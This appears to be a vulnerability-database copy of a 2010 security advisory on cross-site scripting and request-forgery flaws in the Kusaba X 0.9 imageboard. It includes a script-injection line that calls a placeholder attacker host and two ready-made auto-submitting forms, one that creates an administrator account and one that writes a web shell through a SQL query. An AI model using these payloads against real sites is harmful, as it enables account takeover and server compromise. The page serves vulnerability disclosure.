Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kusaba X 0.9 Cross Site Scripting / Cross Site Request Forgery

🗓️ 20 Feb 2010 00:00:00Reported by systemx00Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 44 Views

Kusaba X 0.9 XSS/CSRF vulnerabilities, Feb 9, 2010 - Feb 17, 201

Code
`==========================================  
Kusaba X <= 0.9 XSS/CSRF vulnerabilities  
==========================================  
  
Kusaba X suffers XSS and CSRF vulnerabilities that would allow an attacker to take over the web application and possibly the entire server (depending on the MySQL configuration). The XSS vulnerability is not required to exploit the CSRF but makes the proccess very easy.  
  
  
XSS:  
==========================================  
The “Reason” field in the report function doesn't sanitize user input. The input size is limited to 256 characters, (pleanty for exploitation, but not enough for a textwall of CSRF forms). This can be circumvented by including off-site javascripts, i.e. <script src="http://attacker.com/asdf.js"></script>. (iframes work too) The injected script will render and execute when a Moderator or Administrator views the reports. If a Moderator falls victim, the worst case scenario would be cookie stealing followed by session hijacking and account theft. If an Administrator were to view the malicious report, much more is possible. It would be easy to detect the difference and act accordingly, making this attack more effective.  
==========================================  
  
CSRF:  
==========================================  
These run rampent throughout the application. Here are two of the most severe but there's lots of fun to be had.  
  
1. Add administrative accouts   
  
<form action="http://example.chan/manage_page.php?action=staff&add" method="POST">  
<input name="username" value="user123" />  
<input name="password" value="pass123" />  
<input name="type" value="1" />  
</form>  
<script>document.forms[0].submit();</script>  
  
2. Execute MySQL queries   
  
<form action="http://example.chan/manage_page.php?action=sql" method="POST">  
<input name="query" value="SELECT 'your-shell-here' INTO OUTFILE '/path/to/www';" />  
</form>  
<script>document.forms[0].submit();</script>  
===========================================  
  
Feb 9, 2010 - Reported to Kusaba X dev team.  
Feb 15, 2010 - Kusaba X 0.9.1 released containing patch.  
Feb 17, 2010 - Info released  
  
~~Thanks to Sazpaimon  
~~Greetz to the open source community  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Feb 2010 00:00Current
0.4Low risk
Vulners AI Score0.4
kusaba xcross site scriptingcross site request forgerymysql configurationxsscsrfmoderatoradministratorsqlpatchsazpaimon
44